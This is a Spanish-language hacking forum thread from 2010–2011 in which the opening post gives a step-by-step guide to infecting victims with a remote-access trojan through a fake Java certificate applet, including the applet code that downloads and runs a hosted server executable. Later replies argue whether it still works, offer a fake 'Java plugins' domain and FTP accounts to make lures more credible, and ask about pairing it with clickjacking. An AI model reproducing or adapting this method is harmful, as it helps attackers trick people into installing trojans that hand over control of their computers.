Underc0de

[In]Seguridad Informática => Análisis y desarrollo de malwares => Tutoriales y Manuales de Malwares => Mensaje iniciado por: Neekiinh0 en Julio 23, 2010, 08:52:27 PM

Título: Infectar mediante JavaFake by Devilboy
Publicado por: Neekiinh0 en Julio 23, 2010, 08:52:27 PM
Bueno les vengo con esta guia que la probe y me andubo a la perfeccion y se las traigo para ustedes.

1- Primero que nada necesitamos un Troyano, ya sea CyberGate, Spy-Net, Bifrost o el que quieran.

2- Un servidor de descarga DIRECTA, este es el mejor: http://anyhub.net/

3- Una animacion flash, un script html y un certificado falso de Java aqui lo tienen elijan el servidor que quieran para descargarlo: http://megaupper.com/files/1OUVSQSD/Java-fake.zip

4- Ahora cambian esta parte del code por su URL sel server:

<applet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
      <param name="url" value="http://tu-web.com/server.exe">
    </applet>


Cambian esto:

http://tu-web.com/server.exe


IMPORTANTE: DEBEN TENER UN HOST PARA ALOJAR TODOS LOS ARCHIVOS.

Al aceptar el certificado automaticamente se les baja el server y se lo ejecuta a la victima.

Saludos.
Título: Re:Infectar mediante JavaFake by Devilboy
Publicado por: ANTRAX en Julio 24, 2010, 10:47:57 PM
Excelente post!
Pero esto ya no funciona ya fue parcheado.
En caso de que este errado y alguien lo haya probado actualmente y le haya funcionado por favor que lo haga saber.

Saludos y gracias por traerlo Neekiinh0
Título: Re:Infectar mediante JavaFake by Devilboy
Publicado por: 303010 en Julio 25, 2010, 02:05:55 AM
bueno a mi no me funciona, creo que codeare un poco aver si logro areglarlo.
Título: Re:Infectar mediante JavaFake by Devilboy
Publicado por: H4ZIR en Julio 25, 2010, 08:14:21 AM
ohhhhh :O vas a codear esto XDDDD ???----> <applet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
      <param name="url" value="http://tu-web.com/server.exe">
    </applet>


jajaj que me caigo :D
Título: Re:Infectar mediante JavaFake by Devilboy
Publicado por: FahD en Julio 25, 2010, 09:56:24 AM
Dios que de tiempo...  yo hasta tengo un dominio fake para que apareciera de remitente: pluginsjava.es
Ahora que lo pienso puedo proporcionar cuentas ftp y subdominio de ese mismo domain... ex: server01.pluginsjava.es xD cosas por el estilo para que sea más creible ^^
Quien quiera que me contacte por MP xD
PD: Buen aporte, creí que estaba por el foro por eso no lo posteaba...
Saludos
Título: Re:Infectar mediante JavaFake by Devilboy
Publicado por: ANTRAX en Julio 25, 2010, 02:27:06 PM
Pero seguimos dando vuelta en lo mismo! Esto no funiona ya!!! xD
Título: Re:Infectar mediante JavaFake by Devilboy
Publicado por: FahD en Julio 25, 2010, 02:53:24 PM
xDDD no lo leí sorry... y hasta ahora no sabia que fué parcheado, fue bonito mientras duró xD!
Título: Re:Infectar mediante JavaFake by Devilboy
Publicado por: pythagoras en Agosto 10, 2010, 03:35:00 AM
A Mi Me Funciona Lo eh probado con todos los SO esta detectado eso se pero sigue funcionando.
Título: Re:Infectar mediante JavaFake by Devilboy
Publicado por: Inteligencia en Agosto 10, 2010, 04:31:54 AM
Si funciona xDDDDD muchos lo usan con el clickjacking :l
Título: Re:Infectar mediante JavaFake by Devilboy
Publicado por: .nKs. en Marzo 29, 2011, 01:33:41 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si funciona xDDDDD muchos lo usan con el clickjacking :l

Hola disculpa las molestias.
Estube viendo eso de click jacking y queria ver como es el tema justamente para implementarlo con el JavaFake.
Ya que si se utiliza con el Js de JavaFake el cartel saldria no de la web iframe sino en la web principal, en la capa principal del clickjacking y donde aparece nuestro boton.

¿Alguien a implementado el Método con clickjacking y JavaFake?
Gracias por las respuestas. Saludos a todos
Título: Re:Infectar mediante JavaFake by Devilboy
Publicado por: Devilboy en Marzo 30, 2011, 08:54:31 PM
el metodo aún funciona pero es detectado por los AV´s
Título: Re:Infectar mediante JavaFake by Devilboy
Publicado por: michoacano094 en Abril 14, 2011, 10:38:26 AM
Gracias No Entiendo Bien unso Dicen qe Si Funciona Otros Que No? xD


Toca Ver =D!